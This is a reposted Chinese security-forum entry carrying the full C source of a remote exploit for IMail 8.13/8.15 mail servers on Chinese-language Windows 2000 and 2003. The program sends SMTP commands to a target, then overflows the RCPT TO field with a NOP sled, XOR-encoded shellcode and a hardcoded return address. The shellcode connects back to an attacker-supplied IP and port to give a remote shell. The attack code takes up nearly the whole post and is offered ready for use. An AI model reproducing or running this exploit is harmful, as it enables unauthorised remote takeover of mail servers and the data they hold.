鬼仔:前段时间发过 IMail 2006 and 8.x的Exp ,但是那个是针对英文版的,当时就有朋友说“有中文版的就好了”,这次,就发一个中文版的:Test imail8.13,8.15 on win2000 and win2k3 chinese version.
来源:心路
写这个的时候,懒了一下,没有动态生成shellcode,而是直接使用了一个固定的key来编码,所以某些监听IP和端口会有问题,包含特殊字符,不过程序做了判断,直接不运行。—_—!
代码:
/*******************************************************************************
* Test imail8.13,8.15 on win2000 and win2k3 chinese version.
* code by 云舒,ph4nt0m.org,2006,11
* dou you know who is icy? ^_^
*******************************************************************************/
#include <stdio.h>
#include <winsock2.h>
#pragma comment( lib, "ws2_32" )
#define HELO "EHLO/r/n"
#define FROM "MAIL FROM <[email protected]>/r/n"
/*对shellcode进行编码解码*/
unsigned char shellcode[] =
/* decode */
"/x31/xc9/x83/xe9/xb8/xd9/xee/xd9/x74/x24/xf4/x5b/x81/x73/x13"
/* decode key */
"/xbd/xd7/x50/x90"
"/x83/xeb/xfc/xe2/xf4"
/* shellcode */
"/x41/xbd/xbb/xdd/x55/x2e/xaf/x6f"
"/x42/xb7/xdb/xfc/x99/xf3/xdb/xd5/x81/x5c/x2c/x95/xc5/xd6/xbf/x1b"
"/xf2/xcf/xdb/xcf/x9d/xd6/xbb/xd9/x36/xe3/xdb/x91/x53/xe6/x90/x09"
"/x11/x53/x90/xe4/xba/x16/x9a/x9d/xbc/x15/xbb/x64/x86/x83/x74/xb8"
"/xc8/x32/xdb/xcf/x99/xd6/xbb/xf6/x36/xdb/x1b/x1b/xe2/xcb/x51/x7b"
"/xbe/xfb/xdb/x19/xd1/xf3/x4c/xf1/x7e/xe6/x8b/xf4/x36/x94/x60/x1b"
"/xfd/xdb/xdb/xe0/xa1/x7a/xdb/xd0/xb5/x89/x38/x1e/xf3/xd9/xbc/xc0"
"/x42/x01/x36/xc3/xdb/xbf/x63/xa2/xd5/xa0/x23/xa2/xe2/x83/xaf/x40"
"/xd5/x1c/xbd/x6c/x86/x87/xaf/x46/xe2/x5e/xb5/xf6/x3c/x3a/x58/x92"
"/xe8/xbd/x52/x6f/x6d/xbf/x89/x99/x48/x7a/x07/x6f/x6b/x84/x03/xc3"
"/xee/x94/x03/xd3/xee/x28/x80/xf8/x7d/x17/x90/x50/xdb/xbf/x77/x9f"
"/xdb/x84/xd9/x71/x28/xbf/xbc/x69/x17/xb7/x07/x6f/x6b/xbd/x40/xc1"
"/xe8/x28/x80/xf6/xd7/xb3/x36/xf8/xde/xba/x3a/xc0/xe4/xfe/x9c/x19"
"/x5a/xbd/x14/x19/x5f/xe6/x90/x63/x17/x42/xd9/x6d/x43/x95/x7d/x6e"
"/xff/xfb/xdd/xea/x85/x7c/xfb/x3b/xd5/xa5/xae/x23/xab/x28/x25/xb8"
"/x42/x01/x0b/xc7/xef/x86/x01/xc1/xd7/xd6/x01/xc1/xe8/x86/xaf/x40"
"/xd5/x7a/x89/x95/x73/x84/xaf/x46/xd7/x28/xaf/xa7/x42/x07/x38/x77"
"/xc4/x11/x29/x6f/xc8/xd3/xaf/x46/x42/xa0/xac/x6f/x6d/xbf/xa0/x1a"
"/xb9/x88/x03/x6f/x6b/x28/x80/x90";
void Usage( char *name )
{
printf( "/nCode by 云舒(ph4nt0m.org),thx luoluo(ph4nt0m.org)!/n" );
printf( "Test imail8.13,8.15 on win2000 and win2k3 chinese version./n" );
printf( "Dou you know who is icy? ^_^/n" );
printf( "/nUsage: %s <target_ip> <target_port> <cb_ip> <cb_port>/n", name );
}
int main( int argc, char *argv[] )
{
if( argc != 5 )
{
Usage( argv[0] );
return -1;
}
unsigned int cb_ip = inet_addr(argv[3]);
/* encode input ip by encode key */
cb_ip ^= 0x9050d7bd;
/* offset of ip is 0xb8 */
memcpy( (void *)(shellcode+0xb8), &cb_ip, 4 );
unsigned short cb_port = htons( atoi(argv[4]) );
/* encode input port by encode key */
cb_port ^= 0x9050;
/* offset of port is 0xbe */
memcpy( (void *)(shellcode + 0xbe), &cb_port, 2 );
/* 判断IP和port异或之后是否有特殊字符 */
unsigned char error_char[6] = { 0x00,0x0D,0x0A,0x20,0x3e,0x22 };
unsigned char sz_ip[4] = { 0 };
unsigned char sz_port[2] = { 0 };
memcpy(sz_ip, (void *)&cb_ip, 4);
memcpy(sz_port, (void *)&cb_port, 2);
for( int index = 0; index < 6; index ++ )
{
for (int j = 0; j < sizeof(sz_ip); j ++)
{
if (sz_ip[j] == error_char[index])
{
printf( "rpwt,haha,please change to another ip adress!/n" );
return -1;
}
}
for (int j = 0; j < sizeof(sz_port); j ++)
{
if (sz_port[j] == error_char[index])
{
printf( "rpwt,haha,please change to another port/n");
return -1;
}
}
}
WSAData wsa;
SOCKET sock;
struct sockaddr_in sin;
int ret;
ret = WSAStartup( 0x0202, &wsa );
if( ret != 0 )
{
printf( "WSAStartup error: %d/n", GetLastError() );
return -1;
}
sock = socket( AF_INET, SOCK_STREAM, 0 );
if( sock == INVALID_SOCKET )
{
printf( "Create socket error: %d/n", GetLastError() );
WSACleanup( );
return -1;
}
memset( &sin, 0, sizeof(struct sockaddr_in) );
sin.sin_addr.S_un.S_addr = inet_addr( argv[1] );
sin.sin_family = AF_INET;
sin.sin_port = htons( atoi(argv[2]) );
ret = connect( sock, (struct sockaddr *)&sin, sizeof(struct sockaddr_in) );
if( ret == SOCKET_ERROR )
{
printf( "Connect error: %d/n", GetLastError() );
closesocket( sock );
WSACleanup( );
return -1;
}
printf( "Connect ok!/n" );
char recv_buf[512] = { 0 };
/* get banner */
ret = recv( sock, recv_buf, 512, 0 );
if( ret == SOCKET_ERROR )
{
printf( "Recv error: %d/n", GetLastError() );
closesocket( sock );
WSACleanup( );
return -1;
}
printf( "%s/n", recv_buf );
/* send hello */
ret = send( sock, HELO, strlen(HELO), 0 );
if( ret == SOCKET_ERROR )
{
printf( "Send error: %d/n", GetLastError() );
closesocket( sock );
WSACleanup( );
return -1;
}
/* recv */
memset( recv_buf, 0, 512 );
ret = recv( sock, recv_buf, 512, 0 );
if( ret == SOCKET_ERROR )
{
printf( "Recv error: %d/n", GetLastError() );
closesocket( sock );
WSACleanup( );
return -1;
}
printf( "%s/n", recv_buf );
/* send from */
ret = send( sock, FROM, strlen(FROM), 0 );
if( ret == SOCKET_ERROR )
{
printf( "Send error: %d/n", GetLastError() );
closesocket( sock );
WSACleanup( );
return -1;
}
/* recv */
memset( recv_buf, 0, 512 );
ret = recv( sock, recv_buf, 512, 0 );
if( ret == SOCKET_ERROR )
{
printf( "Recv error: %d/n", GetLastError() );
closesocket( sock );
WSACleanup( );
return -1;
}
printf( "%s/n", recv_buf );
char send_buf[1024] = { 0 };
char *ret_addr = "/xe1/x1e/xfa/x7f";
/* | 548 | */
/* RCPT TO <@:|x90.....shellcode|ret| */
strcat( send_buf, "RCPT TO <@:" );
for( int index = 1; index <= 548 - strlen((char *)shellcode); index ++ )
{
strcat( send_buf, "/x90" );
}
strcat( send_buf, (char *)shellcode );
strcat( send_buf, ret_addr );
strcat( send_buf, ">/r/n/r/n" );
/* send shellcode */
ret = send( sock, send_buf, strlen(send_buf), 0 );
if( ret == SOCKET_ERROR )
{
printf( "Send error: %d/n", GetLastError() );
closesocket( sock );
WSACleanup( );
return -1;
}
printf( "Send exploit %d bytes,check your listing port,good luck!/n", ret );
closesocket( sock );
WSACleanup( );
return 0;
}
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论